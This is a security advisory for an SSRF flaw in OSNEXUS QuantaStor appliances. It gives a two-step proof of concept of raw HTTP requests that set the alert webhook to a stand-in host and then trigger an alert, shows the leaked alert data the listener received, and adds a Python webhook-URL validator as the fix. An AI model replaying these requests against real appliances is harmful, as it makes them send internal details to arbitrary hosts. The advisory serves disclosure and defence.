SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355
Description
An authenticated administrator can configure an alert whose webhook destination (slackWebhookUrl / mattermostWebhookUrl) points at an arbitrary host; raising an alert then makes the appliance itself issue an HTTP request to that host, which is a server-side request forgery (SSRF). The forged outbound request is always a POST.
POC
Step 1: Prepare the SSRF with a request like this:
GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET> HTTP/1.1
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 0
Step 2: Trigger this alert with this request:
GET /qstorapi/alertRaise?title=test&message=test&severity=1 HTTP/1.1
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 1
The POST request received by <TARGET> looks like this (a dump of the Flask request object on the receiving listener; the #### lines are markers in the original dump around Flask-internal fields):
{
#### Python FLASK stuff ####
'endpoint': 'index',
'method': 'POST',
'cookies': ImmutableMultiDict([]),
#### END Python FLASK stuff ####
'data': b'{ "attachments": [ {
    "fallback": "[122] test / test.",
    "color": "#aa2222",
    "title": "[122] test",
    "text": "test",
    "fields": [ {
        "title": "Alert Severity",
        "value": "CRITICAL",
        "short": false
    }, {
        "title": "Appliance",
        "value": "quantastor (https://<HOSTNAME>)",
        "short": true
    }, {
        "title": "System / Driver / Kernel Ver",
        "value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic",
        "short": false
    }, {
        "title": "System Startup",
        "value": "Fri Aug 6 16-02-55 2021",
        "short": true
    }, {
        "title": "SSID",
        "value": "f4823762-1dd1-1333-47a0-6238c474a7e7",
        "short": true
    }, ],
    "footer": "QuantaStor Call-home Alert",
    "footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ",
    "ts": 1628461774 } ], "mrkdwn":true }',
##### FLASK REQUEST STUFF #####
'headers': {
    'Host': '<redacted>', 'User-Agent': 'curl/7.58.0', 'Accept': '*/*', 'Content-Type': 'application/json', 'Content-Length': '790'
},
'args': ImmutableMultiDict([]), 'form': ImmutableMultiDict([]), 'remote_addr': '217.103.63.173', 'path': '/payload/58', 'whois_ip': 'TNF-AS, NL' }
##### END FLASK REQUEST STUFF #####
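The control that prevents this class of bug is validation of the webhook destination at configuration time (the alertConfigSet side), not trust in the administrator's input. The following is an added example, not QuantaStor code; ALLOWED_WEBHOOK_HOSTS, validate_webhook_url and the injectable resolver are assumptions. It rejects the kind of value used in step 1 by enforcing https, an allowlist of webhook hosts, and a check that every address the host resolves to lies outside loopback, private, link-local and other internal ranges, so that neither an IP literal nor a DNS name pointing into the appliance's own network is accepted.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical allowlist: the only hosts this appliance is expected to call
# home to. A real product would let the administrator maintain this list.
ALLOWED_WEBHOOK_HOSTS = {"hooks.slack.com"}


def default_resolver(hostname):
    """Every address (IPv4 and IPv6) the hostname currently resolves to."""
    return {info[4][0] for info in socket.getaddrinfo(hostname, None)}


def address_is_internal(addr):
    """True for addresses an outbound webhook must never be sent to."""
    ip = ipaddress.ip_address(addr)
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_webhook_url(url, resolver=default_resolver,
                         allowed_hosts=ALLOWED_WEBHOOK_HOSTS):
    """Return (ok, reason) for a webhook URL supplied by an administrator.

    Rejects non-https schemes, embedded credentials, non-standard ports,
    hosts outside the allowlist (when one is given) and any host whose
    resolved addresses fall in loopback, private, link-local or other
    internal ranges. IP literals are checked without a DNS lookup.
    """
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False, "scheme must be https"
    if parts.username or parts.password:
        return False, "credentials in URL are not allowed"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port not in (None, 443):
        return False, "non-standard port"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if allowed_hosts is not None and host not in allowed_hosts:
        return False, "host not in webhook allowlist"
    try:
        addrs = {str(ipaddress.ip_address(host))}  # literal: no DNS needed
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError:
            return False, "host does not resolve"
    if not addrs:
        return False, "host does not resolve"
    for addr in sorted(addrs):
        if address_is_internal(addr):
            return False, f"{host} resolves to internal address {addr}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs in the shape of the PoC's slackWebhookUrl /
    # mattermostWebhookUrl values; a fake resolver keeps this offline.
    def fake_dns(hostname):
        return {"1.2.3.4"}

    for candidate in ("http://attacker.example/",
                      "https://hooks.slack.com/services/T0/B0/x",
                      "https://127.0.0.1/hook",
                      "https://[::1]/hook"):
        print(candidate, validate_webhook_url(candidate, resolver=fake_dns,
                                              allowed_hosts=None))
```

The resolver is a parameter so the address check can be exercised without network access; in production the default socket.getaddrinfo lookup is used. Because a hostname can resolve differently at configuration time and at send time, the same check belongs immediately before the outbound request as well, and the HTTP client used for the call-home should not follow redirects to hosts that would fail it.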
References
- cisrt.divd.nl/DIVD-2021-00020/ (mitre: third-party-advisory, exploit, technical-description)
- csirt.divd.nl/CVE-2021-42079 (mitre: third-party-advisory)
- www.wbsec.nl/osnexus (mitre: third-party-advisory, technical-description)
- www.osnexus.com/products/software-defined-storage (mitre: product)